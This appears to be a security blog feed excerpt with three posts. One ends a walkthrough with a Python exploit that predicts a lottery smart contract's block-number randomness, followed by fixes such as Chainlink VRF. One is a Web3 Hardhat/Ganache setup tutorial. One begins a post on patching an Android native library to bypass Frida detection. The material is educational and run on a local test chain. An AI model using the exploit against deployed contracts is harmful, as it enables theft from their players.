    signed_tx = web3.eth.account.sign_transaction(tx, owner_private_key)

    # Send the transaction and wait for the receipt
    tx_hash = web3.eth.send_raw_transaction(signed_tx.raw_transaction)
    tx_receipt = web3.eth.wait_for_transaction_receipt(tx_hash)

    print(&quot;pickWinner executed successfully. Prize awarded to the winner.&quot;)
    print(&quot;Transaction hash:&quot;, tx_hash.hex())

    # Extract the winner&apos;s address from the WinnerSelected event
    winner_address = lottery_contract.functions.getWinner().call()
    print(&quot;Winner of the lottery:&quot;, winner_address)

except Exception as e:
    print(&quot;Error executing pickWinner:&quot;, e)


```
&lt;/details&gt;


To begin, we retrieve the list of current players by calling `getPlayers` on our contract. This function returns a list of addresses, each representing a participant in the lottery. The script then loops through this list and prints each player’s address alongside its index, which helps us keep track of who’s currently entered.

```python
# Retrieve and print the list of players with their indices
players = lottery_contract.functions.getPlayers().call()
print(&quot;Current players in the lottery:&quot;)
for index, player_address in enumerate(players):
    print(f&quot;Index {index}: {player_address}&quot;)

```

Now that we have the list of players, it’s time to prepare the transaction to call `pickWinner`. Since only the contract owner can execute this function, we specify the owner’s address, along with necessary transaction details like `gas`, `gasPrice`, and `nonce`. The `nonce` is automatically fetched to make sure this transaction is unique.

```python
tx = lottery_contract.functions.pickWinner().build_transaction({
    &apos;from&apos;: owner_address,
    &apos;gas&apos;: 2000000,
    &apos;gasPrice&apos;: web3.to_wei(&apos;50&apos;, &apos;gwei&apos;),
    &apos;nonce&apos;: web3.eth.get_transaction_count(owner_address),
})

```

To validate and authorize the transaction, we sign it using the owner’s private key. This step is essential, as it verifies that the transaction is coming from the correct account. Once signed, we send it to the blockchain and wait for confirmation that it’s been processed successfully.

```python
# Sign the transaction with the owner&apos;s private key
signed_tx = web3.eth.account.sign_transaction(tx, owner_private_key)

# Send the transaction and wait for the receipt
tx_hash = web3.eth.send_raw_transaction(signed_tx.raw_transaction)
tx_receipt = web3.eth.wait_for_transaction_receipt(tx_hash)
print(&quot;pickWinner executed successfully. Prize awarded to the winner.&quot;)
print(&quot;Transaction hash:&quot;, tx_hash.hex())

```

Finally, after the `pickWinner` function executes, we retrieve the winning player’s address by calling `getWinner` on the contract. This allows us to see which participant won the lottery, giving us the outcome of this round.

```python
# Extract the winner&apos;s address from the WinnerSelected event
winner_address = lottery_contract.functions.getWinner().call()
print(&quot;Winner of the lottery:&quot;, winner_address)

```

## **Understanding the Exploit**

Finaly, we’ll explore how an attacker could exploit our lottery contract by monitoring conditions to determine the best time to join, thereby maximizing their chances of winning. Here’s how the exploit works, starting with an overview of the prediction function and then examining how the attacker waits for favorable conditions before joining.

&lt;details&gt;
&lt;summary&gt;Exploit code&lt;/summary&gt;

```python
from web3 import Web3
import time
import json

# Connection setup
ganache_url = &quot;http://127.0.0.1:7545&quot;
web3 = Web3(Web3.HTTPProvider(ganache_url))

# Check connection
if not web3.is_connected():
    print(&quot;Error: Unable to connect to Ganache&quot;)
else:
    print(&quot;Connected to Ganache&quot;)

# Contract address and ABI (replace with actual contract address)
contract_address = &quot;0x3da1c86DB9fa85Ba45Cf2DDf5205d41a964800d2&quot;

# Load the ABI from a JSON file
with open(&quot;Lottery.json&quot;) as f:
    contract_json  = json.load(f)
    contract_abi = contract_json[&quot;abi&quot;]

# Initialize contract
lottery_contract = web3.eth.contract(address=contract_address, abi=contract_abi)
print(&quot;Contract initialized&quot;)

# Attacker&apos;s account and private key (ensure this is a test account)
attacker_address = &quot;0xa7E1Dce14Bb439e6710c18e05C0DA71EAd3d0203&quot;
attacker_private_key = &quot;0x85ebe111f9cd1878845c72b10affa75fcbf300123a70c79f01cfbf65cdcd4b50&quot;

# Ticket price in wei (e.g., 0.1 ether)
ticket_price = web3.to_wei(0.1, &quot;ether&quot;)

# Predict the winning index based on block number and players list length
def predict_winner_index(block_number, players):
    hash_value = web3.solidity_keccak(
        [&quot;uint256&quot;, &quot;uint256&quot;],  # Same as Solidity&apos;s abi.encodePacked(uint256, uint256)
        [block_number, len(players)]
    )
    return int(hash_value.hex(), 16) % len(players)

# Wait for a favorable condition
try:
    players = lottery_contract.functions.getPlayers().call()

    if len(players) &gt; 0:
        simulated_players = players + [attacker_address]

        while True:
            # Get the current block number and simulate the next block for prediction
            current_block = web3.eth.get_block(&quot;latest&quot;)
            block_number = current_block.number + 2

            # Predict the winner index if the attacker joins
            predicted_index = predict_winner_index(block_number, simulated_players)

            # Check if the attacker would be the winner
            if simulated_players[predicted_index] == attacker_address:
                print(&quot;Favorable condition! Joining the lottery now would likely result in a win.&quot;)

                # Build the transaction to join the lottery
                tx = lottery_contract.functions.buyTicket().build_transaction({
                    &apos;from&apos;: attacker_address,
                    &apos;value&apos;: ticket_price,
                    &apos;gas&apos;: 2000000,
                    &apos;gasPrice&apos;: web3.to_wei(&apos;50&apos;, &apos;gwei&apos;),
                    &apos;nonce&apos;: web3.eth.get_transaction_count(attacker_address),
                })

                # Sign and send the transaction
                signed_tx = web3.eth.account.sign_transaction(tx, attacker_private_key)
                tx_hash = web3.eth.send_raw_transaction(signed_tx.raw_transaction)
                receipt = web3.eth.wait_for_transaction_receipt(tx_hash)
                print(f&quot;Attacker {attacker_address} successfully joined the lottery.&quot;)
                break
            else:
                print(&quot;Not favorable to join yet. Waiting for the next block...&quot;)
                web3.provider.make_request(&quot;evm_mine&quot;, [])

            # Wait for a short period before rechecking (simulate waiting for a new block)
            time.sleep(1)  # Adjust this delay as needed for your environment
    else:
        print(&quot;No players in the lottery yet.&quot;)
except Exception as e:
    print(&quot;Error:&quot;, e)

```
&lt;/details&gt;


To predict the winner, we use a custom `predict_winner_index` function, which mimics the contract’s formula for calculating the winner. This function takes two inputs: the block number and the length of the players array. By hashing these values together, we can calculate the index of the expected winner, simulating the way the contract selects the winner based on predictable on-chain data.

```python
def predict_winner_index(block_number, players):
    hash_value = web3.solidity_keccak(
        [&quot;uint256&quot;, &quot;uint256&quot;],  # Mimics Solidity&apos;s abi.encodePacked(uint256, uint256)
        [block_number, len(players)]
    )
    return int(hash_value.hex(), 16) % len(players)

```

Next, the script retrieves the current list of players in the lottery. If there are players present, the attacker prepares a simulated list of participants by adding their own address to the end. This allows them to predict the outcome if they join.

```python
players = lottery_contract.functions.getPlayers().call()
if len(players) &gt; 0:
    simulated_players = players + [attacker_address]

```

The attacker then enters a loop, where they monitor each new block to check if joining would likely make them the winner. In each iteration, the script increments the block number by simulating a new block, and then calculates the predicted winning index with the attacker included. This effectively simulates future blocks, allowing the attacker to assess when they would have the best chance of winning.

```python
while True:
    current_block = web3.eth.get_block(&quot;latest&quot;)
    block_number = current_block.number + 2  # Increment to predict the next block

    # Predict the winner index if the attacker joins
    predicted_index = predict_winner_index(block_number, simulated_players)

```

If the predicted index corresponds to the attacker’s address, it indicates a favorable condition to join. At this point, the attacker immediately submits a transaction to join the lottery, signing it with their private key to validate it. This transaction is then sent to the blockchain, where the attacker is added as a player.

```python
if simulated_players[predicted_index] == attacker_address:
   print(&quot;Favorable condition! Joining the lottery now would likely result in a win.&quot;)

   tx = lottery_contract.functions.buyTicket().build_transaction({
       &apos;from&apos;: attacker_address,
       &apos;value&apos;: ticket_price,
       &apos;gas&apos;: 2000000,
       &apos;gasPrice&apos;: web3.to_wei(&apos;50&apos;, &apos;gwei&apos;),
       &apos;nonce&apos;: web3.eth.get_transaction_count(attacker_address),
   })

   signed_tx = web3.eth.account.sign_transaction(tx, attacker_private_key)
   tx_hash = web3.eth.send_raw_transaction(signed_tx.raw_transaction)
   receipt = web3.eth.wait_for_transaction_receipt(tx_hash)
   print(f&quot;Attacker {attacker_address} successfully joined the lottery.&quot;)
   break

```

If the prediction isn’t favorable, the script waits briefly and then simulates a new block. This allows the attacker to continuously monitor and retry until they find an ideal block where their chances of winning are high.

```python
else:
    print(&quot;Not favorable to join yet. Waiting for the next block...&quot;)
    web3.provider.make_request(&quot;evm_mine&quot;, [])
    time.sleep(1)

```

## **Connecting the Scripts to Execute the Exploit**

In this final section, we’ll take a look at how these scripts come together to create a scenario where an attacker could successfully manipulate the lottery to win the prize

First, we start by running `addUser.py` to simulate multiple players joining the lottery. As shown in the screenshot, each player joins successfully, and their addresses are displayed to confirm their entries. This setup builds up the `players` array, setting the stage for our attacker to carefully time their entry.

![](/content/images/2024/11/image-2.png)

Next, we run `exploit.py`, which simulates the attacker waiting for favorable conditions to join. You can see in the output that the script patiently checks each block, waiting until the conditions are just right. Each time it’s not favorable to join, the script simply waits for the next block. Eventually, it detects a favorable block, printing the message: “Favorable condition! Joining the lottery now would likely result in a win.” The attacker’s address is then successfully added to the players list.

![](/content/images/2024/11/image-3.png)

Finally, we execute `selectWinner.py`, which calls the `pickWinner` function to determine the lottery winner. As shown in the last screenshot, the transaction completes, and the winner’s address is displayed. Notably, the winner matches the attacker’s address, confirming that the exploit worked as intended. The transaction hash is also displayed, providing a full record of the event on the blockchain.

![](/content/images/2024/11/image-4.png)

# Securing the Lottery Contract: Mitigating Predictability

To prevent the vulnerabilities we’ve seen in this lottery contract, we need to introduce a more secure approach to randomness. The main issue in the current contract is that it relies on publicly accessible, predictable data (the block number and player count) to select a winner. This opens the door for attackers to manipulate their entry timing and take advantage of the contract’s predictability. Here are a few solutions that could make the lottery contract significantly more secure.

## Use an External Randomness Source: Chainlink VRF

One of the most reliable ways to generate secure randomness on the blockchain is to use an oracle-based solution like **Chainlink VRF (Verifiable Random Function)**. Chainlink VRF provides a tamper-proof source of randomness that cannot be influenced by miners or other participants. Here’s how it would work:

-   When the contract owner is ready to pick a winner, they would request randomness from Chainlink VRF.
-   Chainlink VRF generates a random number off-chain and returns it to the contract, along with cryptographic proof that it was generated securely.
-   The contract verifies the proof and uses the random number to select a winner from the players array.

This approach significantly reduces the risk of manipulation, as the random number generation happens off-chain and cannot be influenced by any participants or miners.

#### Example Integration

Here&apos;s a basic idea of what integrating Chainlink VRF might look like in Solidity:

&lt;details&gt;
&lt;summary&gt;Example of how to use Chainlink VRF&lt;/summary&gt;

```solidity
import &quot;@chainlink/contracts/src/v0.8/VRFConsumerBase.sol&quot;;

contract SecureLottery is VRFConsumerBase {
    address public owner;
    address[] public players;
    bytes32 internal keyHash;
    uint256 internal fee;
    address public winner;

    constructor() VRFConsumerBase(
        0xYourVRFCoordinatorAddress, // VRF Coordinator
        0xYourLinkTokenAddress       // LINK Token
    ) {
        owner = msg.sender;
        keyHash = 0xYourKeyHash;
        fee = 0.1 * 10 ** 18; // LINK fee (depends on the network)
    }

    function buyTicket() public payable {
        require(msg.value == ticketPrice, &quot;Invalid ticket price&quot;);
        players.push(msg.sender);
    }

    function pickWinner() public onlyOwner {
        require(players.length &gt; 0, &quot;No players have joined&quot;);
        require(LINK.balanceOf(address(this)) &gt;= fee, &quot;Not enough LINK&quot;);
        requestRandomness(keyHash, fee);
    }

    function fulfillRandomness(bytes32 requestId, uint256 randomness) internal override {
        uint256 winnerIndex = randomness % players.length;
        winner = players[winnerIndex];
        payable(winner).transfer(address(this).balance);
        delete players;
    }
}

```
&lt;/details&gt;


## Commit-Reveal Scheme

Another alternative, though less secure than Chainlink VRF, is the **commit-reveal scheme**. In this approach, participants (or even the contract itself) commit to a secret value during the entry phase. Once all entries are closed, the secret values are revealed, and a hash of these values is used to determine the winner. This method prevents participants from altering their entries after seeing others’ contributions, adding a layer of unpredictability.

However, the commit-reveal scheme is more complex to implement and is still vulnerable to certain attacks (like front-running). For true security, it’s often better to rely on external, verifiable randomness.

## Blockhash Limitations

Some developers attempt to use `blockhash` from previous blocks as a source of randomness. However, `blockhash` should be avoided in most cases, as miners can influence its value and it becomes unreliable after a certain number of blocks. While using the hash of a much older block could provide slight unpredictability, it’s generally insufficient for securing valuable assets and does not eliminate the risk of miner manipulation.

# Conclusions

This exploration of a vulnerable lottery contract has highlighted the critical importance of randomness in blockchain applications. By carefully analyzing the contract’s structure and predictable selection mechanism, we demonstrated how an attacker could leverage this predictability to manipulate the outcome. The experiment showed that when block data or participant counts are used as inputs for &quot;random&quot; selections, they can become points of vulnerability, leaving contracts open to exploitation.

Using Ganache allowed us to control the environment fully, making it easier to illustrate the exploit in action. However, it’s essential to remember that, in a real-world setting, continuously fluctuating block numbers and dynamic participation would make this kind of manipulation more challenging—though not impossible. This reinforces the need for secure and verifiable randomness in lottery or chance-based contracts.

For developers, the key takeaway is to avoid relying on simple on-chain data for critical functions that require unpredictability. Using secure randomness solutions, such as Chainlink VRF (Verifiable Random Function), can provide the tamper-proof randomness needed to prevent these kinds of attacks.

Ultimately, understanding these vulnerabilities is a vital step toward building more secure smart contracts. By identifying and addressing potential weaknesses, we can create more robust decentralized applications that protect users and maintain fairness in all scenarios.

# References

-   Chainlink VRF - Verifiable Randomness for Smart Contracts. &quot;Chainlink Documentation.&quot; Available at: https://docs.chain.link/vrf/v2/introduction/
-   Web3.py - A Python Library for Interacting with Ethereum. &quot;Web3.py Documentation.&quot; Available at: [https://web3py.readthedocs.io/](https://web3py.readthedocs.io/)
-   Truffle - Development Framework for Ethereum. &quot;Truffle Suite Documentation.&quot; Available at: https://trufflesuite.com/docs/
-   Ethereum - Open-Source Blockchain Platform for Smart Contracts. &quot;Ethereum Whitepaper.&quot; Available at: https://ethereum.org/en/whitepaper/
-   JSON-RPC API - Ethereum JSON-RPC Documentation. &quot;Ethereum Wiki.&quot; Available at: https://eth.wiki/json-rpc
-   Solidity Security - Best Practices for Secure Smart Contracts. &quot;Solidity Documentation: Security Considerations.&quot; Available at: https://docs.soliditylang.org/en/v0.8.0/security-considerations.html
-   Zed - Code Editor for Developers. &quot;Zed Documentation.&quot; Available at: [https://zed.dev/](https://zed.dev/)</content:encoded><author>Ruben Santos</author></item><item><title>Pentesting Web3: Setting Up a Smart Contract Testing Environment</title><link>https://www.kayssel.com/post/web3-1</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-1</guid><description>Web3 transforms the internet with decentralization via blockchain, empowering users over data and security. This article covers blockchain basics, smart contracts, security risks, common vulnerabilities, and lays groundwork for upcoming articles on Web3 attacks and secure development practices</description><pubDate>Sun, 03 Nov 2024 09:50:33 GMT</pubDate><content:encoded># **Introduction to Web3 and Blockchain Security**

As the internet moves toward a new era known as Web3, we’re seeing a shift from centralized platforms—where companies control data and infrastructure—to a decentralized model that places more power in the hands of users. This new internet, built on blockchain technology, introduces exciting possibilities with decentralized applications (dApps) and smart contracts that operate independently, without any single authority.

But with this shift comes a unique set of security challenges. Unlike traditional systems where security issues can often be quickly patched, Web3&apos;s reliance on blockchain&apos;s immutable structure makes fixing vulnerabilities after deployment much more complex. As a result, understanding and securing Web3 applications is more critical than ever.

This article series will walk you through the fundamentals of Web3 and blockchain technology, covering everything from key terminology to hands-on smart contract deployment. Along the way, we’ll explore common vulnerabilities and dive into tools and techniques to keep decentralized systems safe. By the end, you’ll not only understand the power of Web3 but also be equipped with the skills to protect it.

Let’s start by exploring the essential concepts behind Web3, blockchain, and smart contracts and discover what makes security such a top priority in this new era of the internet.

# How Does Blockchain Work?

To really get Web3, it helps to understand how blockchain—the technology behind it—all fits together. At its core, blockchain is like a super-secure, digital ledger for tracking transactions and assets, but with a twist. Instead of being stored on a single, centralized server controlled by one authority, blockchain is spread out across a network of computers, where each one (called a “node”) holds a complete copy of the ledger. This decentralized structure is what gives Web3 its strength and independence.

Here’s how it works: every time there’s a new entry, it’s stored in a &quot;block&quot; that includes recent transactions, a timestamp, and a unique identifier, or “hash.” Each new block links to the one before it by referencing that previous block&apos;s hash, creating an unbreakable “chain” of data. Thanks to this chaining, if anyone tries to alter information in a block, it will change the hash, which breaks the chain and alerts the network. This setup makes blockchain incredibly hard to tamper with.

One of blockchain’s standout features is its immutability. Once something is recorded on the blockchain, changing it is almost impossible. This quality is perfect for Web3 applications that prioritize security, transparency, and trust. But, there’s a downside: in traditional databases, you can update records to fix errors. On the blockchain, mistakes or code vulnerabilities stick around, which can be a headache to correct.

# What is a Smart Contract?

Smart contracts are at the heart of Web3 and form the backbone of most decentralized apps, or dApps. Put simply, a smart contract is a self-running program on the blockchain that automatically enforces a set of rules between different parties. Think of it as a digital contract that doesn’t need middlemen—once the conditions set in the contract are met, it just takes action on its own.

Traditional contracts usually require trust in a third party, like a lawyer or a bank. But with smart contracts, there’s no need for that; they’re “trustless,” meaning they rely purely on blockchain’s code and consensus rules. For example, in a crowdfunding campaign, a smart contract could automatically release funds to the project creator if they reach their goal by a specific date. If not, the money gets returned to the backers—no middleman required.

Smart contracts are typically written in programming languages like Solidity (a popular choice for Ethereum-based contracts) and live on the blockchain, making them transparent and easy to verify. However, once a smart contract is deployed, its code is set in stone. This immutability is both an advantage and a drawback: while it ensures transparency and security, it also means any bugs or vulnerabilities can’t be easily fixed.

Since smart contracts often manage valuable assets, security is key. If there’s a flaw in the code, attackers could exploit it, potentially leading to big financial losses for users. One well-known example of this is the 2016 DAO Hack, where millions were lost due to a vulnerability in the contract’s code. This is why secure coding practices and thorough testing are essential when developing smart contracts.

# Key Blockchain Terminology

Before diving into smart contract deployment and interaction, it&apos;s important to familiarize yourself with some foundational blockchain terms that haven’t been covered yet but are essential for understanding the ecosystem. These concepts will frequently come up when working with smart contracts, exploring blockchain structures, and analyzing transactions. Here’s a quick guide to these essential terms:

## **Account**

Think of an account as your “profile” on the blockchain, which has its own unique address (a long hexadecimal code) and balance. There are two main types of accounts, and each has a specific role:

1.  **Externally Owned Account (EOA):**  
    This type of account is managed by a private key (think of it like a password) that you control through a wallet, such as MetaMask. EOAs are able to send transactions, including those that interact with smart contracts. Essentially, this is the “personal” account you use to control assets and initiate actions on the blockchain.
2.  **Contract Account:**  
    A contract account is created when a smart contract is deployed on the blockchain. Unlike EOAs, contract accounts don’t have private keys and can’t initiate actions on their own. Instead, they react to transactions initiated by EOAs or other contracts. This account type represents the smart contracts themselves.

## **Transaction**

Transactions are how accounts interact with each other and with the blockchain. A transaction is any action that changes the state of the blockchain—whether it’s transferring cryptocurrency or running a function in a smart contract. Every transaction has three main parts:

1.  **Sender:** The account initiating the transaction.
2.  **Recipient:** The account receiving it.
3.  **Value:** The amount of cryptocurrency (if any) being sent.

Each transaction also includes a **gas price** and **gas limit**, which cover the cost of computation needed to process the transaction. After being verified by validators, a transaction is permanently recorded on the blockchain.

## **Validator**

Validators are critical for keeping the blockchain accurate and secure. They verify each transaction against network rules, ensuring it’s legitimate before adding it to the blockchain. Validators are compensated with **gas fees** for their work. The selection process for validators varies by consensus mechanism (e.g., Proof of Stake or Proof of Work), but their core function remains the same: maintaining blockchain integrity by validating transactions.

## **Gas**

Gas is a fee users pay for blockchain transactions, compensating validators for the computational work involved. Each transaction requires a certain amount of gas, calculated as **gas used × gas price**:

-   **Gas Price:** The amount of Ether (ETH) a user is willing to pay per unit of gas, usually measured in gwei (1 gwei = 0.000000001 ETH). A higher gas price can speed up transaction processing, as validators prioritize these transactions.
-   **Gas Limit:** The maximum gas a user is willing to pay for a transaction. More complex transactions (e.g., smart contract interactions) need higher limits. If the limit is too low, the transaction fails, but any gas consumed up to that point is still charged.

## **Gas Fees**

Gas fees are the total cost a user pays to execute a transaction on the blockchain. Fees are deducted from the user’s balance and given to the validator. During peak network activity, gas fees can increase as users compete to have their transactions processed faster.

## **Nonce**

A **nonce** is a unique number associated with each account’s transactions. It helps keep transactions in the correct order and prevents **double-spending** (sending the same transaction twice). Each time an account sends a new transaction, its nonce increments, ensuring the transaction sequence remains accurate.

## **Token**

A token represents a digital asset on the blockchain, commonly following standards like ERC-20 for **fungible tokens** (identical units, like currency) and ERC-721 for **non-fungible tokens (NFTs)** (unique items, like digital collectibles). Tokens serve various roles within decentralized apps (dApps), such as representing assets, utilities, or value, and can be transferred or traded.

## **Wallet**

A wallet is an app that helps users manage accounts, store private keys, and interact with the blockchain. Popular wallets like MetaMask allow users to send transactions, store tokens, and connect to dApps. Importantly, wallets don’t actually store assets; they store private keys, which control access to blockchain assets. Keeping private keys secure is crucial, as they’re the only way to access your account.

## **Explorer**

A **blockchain explorer** (such as Etherscan for Ethereum) is a tool for viewing all public data on the blockchain, including transactions, blocks, accounts, and smart contracts. Explorers provide transparency, enabling users to verify transactions, monitor account activity, and even review smart contract code.

# How It All Connects

Let’s go through an example that ties together the different concepts we’ve covered to understand them more clearly. Imagine Alex wants to use a decentralized finance (DeFi) app to earn interest by lending cryptocurrency.

To start, Alex needs an account on the blockchain, which works like their profile and has a unique address tied to a private key. This account is managed through a wallet app like MetaMask, where the private key is securely stored. Think of this private key as a super-secure password that only Alex should have. With the wallet, Alex can directly interact with the blockchain from their computer or phone. To join the DeFi lending pool, Alex initiates a transaction to transfer some cryptocurrency to the DeFi application’s smart contract.

This transaction doesn’t just move funds from Alex’s account; it actually communicates with the smart contract—a self-executing piece of code that runs on the blockchain. In this case, the contract manages the lending pool, accepting deposits, calculating interest, and keeping track of who has contributed funds. When Alex submits this transaction, their wallet app “signs” it using their private key, making sure that the transaction is authentic and can’t be altered by anyone else.

Once signed, the transaction is broadcast to the blockchain network, where it awaits approval from **validators**. Validators are crucial players on the blockchain who confirm and record transactions. They ensure that each transaction follows the rules and, in exchange, they’re paid a fee, known as **gas**. Alex sets both a gas price (how much they’re willing to pay per unit of gas) and a gas limit (the max amount they’ll pay to process this transaction). Setting a higher gas price can speed things up since validators will prioritize transactions with higher fees. After the transaction is verified by the validators, it’s added to a new block on the blockchain—a block that contains this and other transactions. Once the block is completed, it’s linked to the chain of previous blocks, creating a permanent record of Alex’s transaction.

Once that’s done, the DeFi app’s smart contract confirms Alex’s deposit by issuing a **token** back to Alex’s account. This token is an ERC-20 token (a popular standard on Ethereum), and it represents Alex’s share in the lending pool. It’s a bit like a receipt that proves Alex has contributed to the pool and may start earning interest over time, depending on how the smart contract is set up.

At any time, Alex can use a **blockchain explorer** like Etherscan to track their transaction, check their token balance, or review details about the DeFi smart contract. Blockchain explorers provide transparency into all this activity, letting users see what’s happening across the network.

# Deploying Your Smart Contract Locally with Ganache UI

After understanding all the basic concepts, we’re ready to set up a local blockchain environment, deploy a smart contract, and start interacting with it. You can use any code editor you prefer—VS Code is a popular choice, but any editor will work just fine. In the upcoming chapters, we’ll dive into common vulnerabilities and explore strategies to secure your contracts effectively.

To get started, open your code editor and create a new project folder—let’s call it &quot;Ether.&quot; In your terminal, navigate to the project directory and initialize a Hardhat project with the following commands:

```bash
npm install --save-dev hardhat
npx hardhat init

```

![](/content/images/2024/10/image-26.png)

Hardhat CLI

Next, we’ll create the smart contract. Inside the _contracts_ folder, delete any sample contracts (like `Greeter.sol`) and create a new file called `SimpleStorage.sol`. Open this file and add the following Solidity code:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract SimpleStorage {
    uint256 private storedData;

    function set(uint256 x) public {
        storedData = x;
    }

    function get() public view returns (uint256) {
        return storedData;
    }
}

```

Our `SimpleStorage` contract is straightforward—it has a variable called `storedData` and two functions. The `set` function allows anyone to store a value in `storedData`, while the `get` function retrieves it. Once the contract is written, compile it by running:

![](/content/images/2024/10/image-27.png)

Compiling the SmartContract

Hardhat will compile your contract and store the output files in the _artifacts_ folder.

Now, let’s set up Ganache. [Open Ganache UI,](https://archive.trufflesuite.com/ganache/) select _Quickstart Ethereum_, and it will create a local blockchain with 10 pre-funded accounts. The default RPC server for Ganache is `http://127.0.0.1:7545`. In Ganache, you’ll see a list of accounts—click the key icon next to one to reveal its private key and copy it.

![](/content/images/2024/10/image-33.png)

Accessing the private key of the account

Then, open _hardhat.config.js_ and add the Ganache network configuration:

```javascript
require(&quot;@nomicfoundation/hardhat-toolbox&quot;);

/** @type import(&apos;hardhat/config&apos;).HardhatUserConfig */
module.exports = {
  solidity: &quot;0.8.27&quot;,
  networks: {
    ganache: {
      url: &quot;http://127.0.0.1:7545&quot;, // Ganache&apos;s default RPC server address
      accounts: [
        &quot;0xd6d215c98c4fd42ddb7b1a8ab89275bc284412267ef3f300cb61ef6fcb0d4d4e&quot;,
      ], // Replace with a private key from Ganache UI
    },
  },
};



```

Replace `&quot;0xYourPrivateKeyHere&quot;` with the actual private key from Ganache, including the `0x` prefix.

With everything configured, it’s time to deploy! In the _scripts_ folder, create a new file called `deploy.js` and add the following code:

```solidity
const hre = require(&quot;hardhat&quot;);

async function main() {
  const SimpleStorage = await hre.ethers.getContractFactory(&quot;SimpleStorage&quot;);
  const simpleStorage = await SimpleStorage.deploy();
  await simpleStorage.waitForDeployment();

  console.log(&quot;SimpleStorage deployed to:&quot;, simpleStorage.target);
}

main().catch((error) =&gt; {
  console.error(error);
  process.exitCode = 1;
});


```

This script uses Hardhat’s `ethers` library to deploy the `SimpleStorage` contract and logs the contract’s address to the console. To deploy to the Ganache network, run:

```bash
npx hardhat run scripts/deploy.js --network ganache

```

Once you run the command, you should see the contract’s address in the terminal. To double-check, open Ganache UI and look under the _Transactions_ tab for the latest transaction. You’ll see the contract creation with the contract address included.

![](/content/images/2024/10/image-30.png)

Deploying the contract

![](/content/images/2024/10/image-34.png)

Contract deployed in Ganache

To interact with the contract, open the Hardhat console and specify Ganache as the network:

```bash
npx hardhat console --network ganache

```

In the console, you can attach to the deployed contract and call its functions. Start by attaching to the contract:

```javascript
const SimpleStorage = await ethers.getContractFactory(&quot;SimpleStorage&quot;);
const simpleStorage = await SimpleStorage.attach(&quot;YOUR_CONTRACT_ADDRESS&quot;); // Replace with the actual address

```

To set a value, use the `set` function as follows:

```javascript
await simpleStorage.set(42);

```

Then, retrieve the stored value with the `get` function:

```javascript
const value = await simpleStorage.get();
console.log(&quot;Stored Value:&quot;, value.toString());

```

Each interaction with the contract will appear as a transaction in Ganache UI, where you can view details about gas usage, account balances, and transaction status.

![](/content/images/2024/10/image-35.png)

Using hardhat console to interact with the netwrok

![](/content/images/2024/10/image-36.png)

Successful transaction

# Conclusions

In this first chapter, we’ve covered the basics of Web3 concepts and set up a local environment for deploying smart contracts. Understanding these fundamentals is essential as we begin exploring how to identify and analyze vulnerabilities within decentralized applications.

In upcoming chapters, we’ll examine real-world vulnerabilities in smart contracts, diving into how they can be exploited and how to defend against these attacks. From reentrancy issues to insecure token implementations, each section will break down specific attack vectors and mitigation strategies, equipping you with the skills to secure Web3 projects effectively.

Thank you for joining me on this journey into Web3 security! Stay tuned as we delve deeper into practical examples, uncover common weaknesses, and develop a robust toolkit for securing the decentralized web.

# Resources

-   **Ganache** - Personal Blockchain for Ethereum Development. &quot;Truffle Suite.&quot; Available at: [https://trufflesuite.com/ganache/](https://trufflesuite.com/ganache/)
-   **Hardhat** - Ethereum Development Environment for Professionals. &quot;Hardhat Documentation.&quot; Available at: [https://hardhat.org/](https://hardhat.org/)
-   **Ethers.js** - A Complete and Compact Library for Interacting with the Ethereum Blockchain. &quot;Ethers.js Documentation.&quot; Available at: https://docs.ethers.org/
-   **Solidity** - Language for Writing Smart Contracts on Ethereum. &quot;Solidity Documentation.&quot; Available at: https://docs.soliditylang.org/
-   **MetaMask** - Ethereum Wallet and Gateway to Blockchain Apps. &quot;MetaMask.&quot; Available at: [https://metamask.io/](https://metamask.io/)
-   **OpenZeppelin** - Secure Smart Contract Libraries for Ethereum. &quot;OpenZeppelin.&quot; Available at: [https://openzeppelin.com/](https://openzeppelin.com/)
-   **Etherscan** - Ethereum Blockchain Explorer. &quot;Etherscan.&quot; Available at: [https://etherscan.io/](https://etherscan.io/)</content:encoded><author>Ruben Santos</author></item><item><title>Patching Native Libraries for Frida Detection Bypass</title><link>https://www.kayssel.com/post/android-10</link><guid isPermaLink="true">https://www.kayssel.com/post/android-10</guid><description>In this chapter, we learned to patch a native library to bypass Frida detection. We explored decompiling the APK, modifying the detection function’s flow, recompiling the APK, and testing the bypass, highlighting the limits of basic obfuscation.</description><pubDate>Sun, 27 Oct 2024 12:21:45 GMT</pubDate><content:encoded># Introduction

[In the previous chapter](https://www.kayssel.com/post/native/), we took a closer look at native libraries and how Frida can be used to bypass detection mechanisms even when the detection functions are implemented within native code. We demonstrated that while using native functions for detection makes bypassing more challenging, Frida’s flexibility can still overcome these security measures in many cases.

In today’s chapter, we’re shifting our focus to directly patching the native library itself. This approach allows us to modify the detection logic at its source, bypassing the detection code without relying on external workarounds. We’ll go through the process of decompiling the APK, analyzing the native code to locate detection functions, and implementing a patch that disables the Frida detection. By the end of this chapter, you’ll understand how to interact with native code directly, gaining insight into native-level security and reverse-engineering techniques.

# Updating the Native Library: Adding a Frida Detection Function

In this section, we&apos;ll explore how to enhance our native library code to include a more sophisticated Frida detection function. In contrast to simpler detection methods that return a `boolean` value, which Frida scripts can easily hook and override, this approach will instead exit the application immediately upon detecting Frida. This method is more robust, making it harder to bypass with typical Frida-based hooking.

Below is the code implementation for our `detectFridaAndExit` function, which checks for the presence of Frida using multiple methods and immediately exits the application if any Frida-related indicators are detected.

&lt;details&gt;
&lt;summary&gt;DetectFridaAndExit&lt;/summary&gt;

```cpp
#include &lt;jni.h&gt;
#include &lt;string&gt;
#include &lt;dirent.h&gt;  // To scan directories
#include &lt;unistd.h&gt;  // For access function
#include &lt;fstream&gt;   // To check for Frida processes
#include &lt;sys/types.h&gt;
#include &lt;sys/stat.h&gt;
#include &lt;stdlib.h&gt;  // For exit()

extern &quot;C&quot; JNIEXPORT jstring JNICALL
Java_com_example_localauth_MainActivity_stringFromJNI(
        JNIEnv* env,
        jobject /* this */) {
    std::string hello = &quot;Hello from C++&quot;;
    return env-&gt;NewStringUTF(hello.c_str());
}

extern &quot;C&quot;
JNIEXPORT void JNICALL
Java_com_example_localauth_MainActivity_detectFridaAndExit(
        JNIEnv* env,
        jobject /* this */) {

    // 1. Check for Frida-related libraries in the process
    const char* suspiciousLibs[] = {
            &quot;frida-agent&quot;,
            &quot;frida-gadget&quot;,
            &quot;libfrida-gadget.so&quot;
    };

    for (const char* lib : suspiciousLibs) {
        // Check if the Frida library is loaded
